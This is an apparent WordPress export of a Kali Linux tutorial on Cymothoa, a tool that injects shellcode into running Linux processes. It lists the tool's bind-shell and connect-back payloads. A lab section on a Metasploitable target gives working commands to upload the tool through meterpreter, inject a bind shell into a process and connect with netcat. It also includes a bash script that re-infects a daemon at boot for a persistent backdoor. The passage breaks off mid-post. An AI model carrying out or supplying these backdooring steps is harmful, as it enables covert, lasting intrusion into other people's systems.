{"id":246,"date":"2018-07-09T11:41:06","date_gmt":"2018-07-09T06:11:06","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=246"},"modified":"2018-07-09T11:41:06","modified_gmt":"2018-07-09T06:11:06","slug":"cymothoa","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","title":{"rendered":"Maintaining Access to a Linux Machine Using Cymothoa – Post Exploitation"},"content":{"rendered":"

Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa.<\/p>\n

Cymothoa uses ptrace library in nix systems to evaluate running processes & inject shellcodes. The greatest advantage of this tool is that we need not create a separate process for the backdoor. While a process is running itself, we can infect a process and start a backdoor. Say for example, if we exploited a web server, hell sure apache2 or httpd or nginx or whatever the web server program is, will be turned on during boot. So we try to inject cymothoa to such service daemons & automate its start during boot. Let’s see it in action, but first, learn a bit about cymothoa<\/p>\n

Homepage: http:\/\/cymothoa.sourceforge.net\/<\/a><\/span><\/p>\n

Options<\/strong><\/h2>\n
Syntax<\/strong>: cymothoa -p <pid> -s <shellcode_number> [options]<\/pre>\n
Main options:<\/strong>\n\t-p\tprocess pid\n\t-s\tshellcode number\n\t-l\tmemory region name for shellcode injection (default \/lib\/ld)\n\t  \tsearch for \"r-xp\" permissions, see \/proc\/pid\/maps...\n\t-m\tmemory region name for persistent memory (default \/lib\/ld)\n\t  \tsearch for \"rw-p\" permissions, see \/proc\/pid\/maps...\n\t-h\tprint this help screen\n\t-S\tlist available shellcodes\n\nInjection options (overwrite payload flags):<\/strong>\n\t-f\tfork parent process\n\t-F\tdon't fork parent process\n\t-b\tcreate payload thread (probably you need also -F)\n\t-B\tdon't create payload thread\n\t-w\tpass persistent memory address\n\t-W\tdon't pass persistent memory address\n\t-a\tuse alarm scheduler\n\t-A\tdon't use alarm scheduler\n\t-t\tuse setitimer scheduler\n\t-T\tdon't use setitimer scheduler\n\nPayload arguments:<\/strong>\n\t-j\tset timer (seconds)\n\t-k\tset timer (microseconds)\n\t-x\tset the IP\n\t-y\tset the port number\n\t-r\tset the port number 2\n\t-z\tset the username (4 bytes)\n\t-o\tset the password (8 bytes)\n\t-c\tset the script code (ex: \"#!\/bin\/sh\\nls; exit 0\")\n\t  \tescape codes will not be interpreted...\nPayloads<\/strong>\n\n0 - bind \/bin\/sh to the provided port (requires -y)\n1 - bind \/bin\/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>\n2 - bind \/bin\/sh to tcp port with password authentication (requires -y -o)\n3 - \/bin\/sh connect back (requires -x, -y)\n4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)\n5 - script execution (see the payload), creates a tmp file you must remove\n6 - forks an HTTP Server on port tcp\/8800 - http:\/\/xenomuta.tuxfamily.org\/\n7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com\n8 - forkbomb (just for fun...) - Kris Katterjohn\n9 - open cd-rom loop (follows \/dev\/cdrom symlink) - izik@tty64.org\n10 - audio (knock knock knock) via \/dev\/dsp - Cody Tubbs (pigspigs@yahoo.com)\n11 - POC alarm() scheduled shellcode\n12 - POC setitimer() scheduled shellcode\n13 - alarm() backdoor (requires -j -y) bind port, fork on accept\n14 - setitimer() tail follow (requires -k -x -y) send data via upd<\/pre>\n
Lab: Inject Backdoor into a Compromised Linux System<\/strong><\/h3>\n
Scenario<\/strong>: We have an attacker system running Kali linux with IP 192.168.0.103, a target Linux system(metasploitable 2.0) with IP 192.168.0.102. The story continues after the victim is exploited. I have already got a meterpreter shell connected to the victim.<\/p>\n
I will explain in brief the procedure for this. Take a look at the following figure.<\/p>\n
 <\/p>\n
\"cymothoa\"<\/a>
Post Exploitation & Backdooring Procedure with cymothoa.<\/figcaption><\/figure>\n
Yes, that is the algorithm. I want you to understand the procedure rather than just copying the steps. We first exploit the system gain access to it. Then the rest is all about Maintaining access.<\/p>\n
Then we can try uploading the existing cymothoa binary(\/usr\/bin\/cymothoa or \/usr\/share\/cymothoa) to the target & try executing it. But it failed for me all the time. So if it does, proceed to step 3 below. If it doesn’t, don’t worry, we have access to the system, we will download a new copy & install it.<\/p>\n
After installation, try executing it. If the cymothoa banner comes, then the installation is successful. After this, we try infecting a running process & see if we can get a connection. Mostly this will succeed. If it doesn’t just try it with another process. But the problem with this is it only lasts for the present & not for the future.<\/p>\n
Meaning, if the process dies or the system is rebooted, we won’t get the backdoor running. For this, we create a shell script and edit some boot time configurations in the victim & make a process infected each time the system starts or reboots. Thus we can have a persistent backdoor.<\/p>\n
Enough Talk, Lets Attack!<\/em><\/p>\n
Step 1: Download Cymothoa & Upload it to Victim<\/strong><\/p>\n
Download the latest version from the link below using the web browser in Kali Linux attacker machine.<\/p>\n
Download Link: http:\/\/sourceforge.net\/projects\/cymothoa\/files\/cymothoa-1-alpha\/<\/a><\/span><\/p>\n
\"cymothoa\"<\/a>
Cymothoa being Downloaded in Kali Linux Attacker machine.<\/figcaption><\/figure>\n
The default location is \/root\/Downloads. Remember this.<\/p>\n
Now I have a meterpreter session running(How to gain access in Exploitation section.). Upload the downloaded archive to the victim. Optionally you can also download it directly to the victim (if you know).<\/p>\n
meterpreter > upload Downloads\/cymothoa<press tab> <space> \/root\/\nmeterpreter > shell\ncommand: tar -xvf cymothoa< Enter full name here, Pressing tab key Doesen't work><\/pre>\n
\"cymothoa\"<\/a>
Uploading the archive to the victim.<\/figcaption><\/figure>\n
 <\/p>\n
Note: Every time you drop into a shell from meterpreter, the shell has limited capabilities. Tab key doesn’t work & vim doesn’t return a display. It crashes if we open something in vim or nano.<\/p>\n
Step 2:<\/strong> Install Cymothoa & Execute.<\/strong><\/p>\n
While we are in the shell. Change directory to the location we uploaded the archive and give execute permissions. Then execute the “Makefile”.<\/p>\n
command cd <location> \ncommand: chmod +x cymothoa<full name> -R \ncommand: .\/Makefile<\/pre>\n
\"cymothoa\"<\/a>
Change permissions<\/figcaption><\/figure>\n
Now try to execute the file. Remember to be in the directory where you uploaded the archive.<\/p>\n
Command: .\/cymothoa<\/pre>\n
\"cymothoa\"<\/a>
Cymothoa Installed<\/figcaption><\/figure>\n
 <\/p>\n
Step 3: Infect a running process.<\/strong><\/p>\n
Now find the processes running in the system & note the process id (pid).<\/p>\n
command: ps -e<\/pre>\n
\"Cymothoa\"<\/a>
Running Processes in the victim<\/figcaption><\/figure>\n
Now, infect the process with cymothoa.<\/p>\n
syntax: .\/cymothoa -p <pid> -s <shellcode number> -y <listening port><\/pre>\n
command: .\/cymothoa -p 5476 -s 1 -y 100<\/pre>\n
Tip: Remember to check whether the listening port(-y option) is already in use.<\/em><\/p>\n
Now check if the port is open<\/p>\n
command: netstat -l | grep 100<your port here><\/pre>\n
\"cymothoa\"<\/a>
Infecting a process with Cymothoa<\/figcaption><\/figure>\n
 <\/p>\n
Step 4<\/strong>: Try a netcat connection from the attacker machine.<\/strong><\/p>\n
Open up a new terminal in Kali Linux attacker system & initiate a netcat connection to the port we specified<\/p>\n
command: nc 192.168.0.102 100 <give your victim ip & port><\/pre>\n
\"cymothoa\"<\/a>
Netcat Connection to Cymothoa Backdoor<\/figcaption><\/figure>\n
There you have…!<\/p>\n
Step 5<\/strong>: Prepare script, upload it & set up execution.<\/strong><\/p>\n
This is the hard part. If you have any idea about shell scripting you can understand. Or else try to learn some. Anyway, the script is very simple. It first extracts the pid of a service or a daemon. Checks if it is a number or not.<\/p>\n
Sometimes a process will have child processes. So there will be more than one pids available. In that case it is essential to extract one pid alone from a list of pids. Then the script assigns the pid to a variable (say q here). Then executes cymothoa with value of the variable q as the value for the “-p” option. Here is the script.<\/p>\n
#!\/bin\/bash\np=`cat \/var\/run\/crond.pid`\n#extracts the pid. Here replace the last with a process of your desire.\n#example: p=`cat \/var\/run\/apache2.pid`.\n#Remember the chracter before cat & after pid is a backtick & not an inverted comma.<\/span>\nif [ \"$p\" -eq \"$p\" ] 2>\/dev\/null; then #checks whether it's a number or not.<\/span>\nq=$p\nelse\nq=`(echo $p | awk '{print $2}')` #takes the next row which will be a number. Here also it's a backtick\nfi\necho $q\nexec \/cymothoa-1-alpha\/cymothoa -p $q -s 1 -y 100 # make sure to give absolute path of cymothoa in the victim.<\/span>\nexit<\/pre>\n
Things to note:<\/p>\n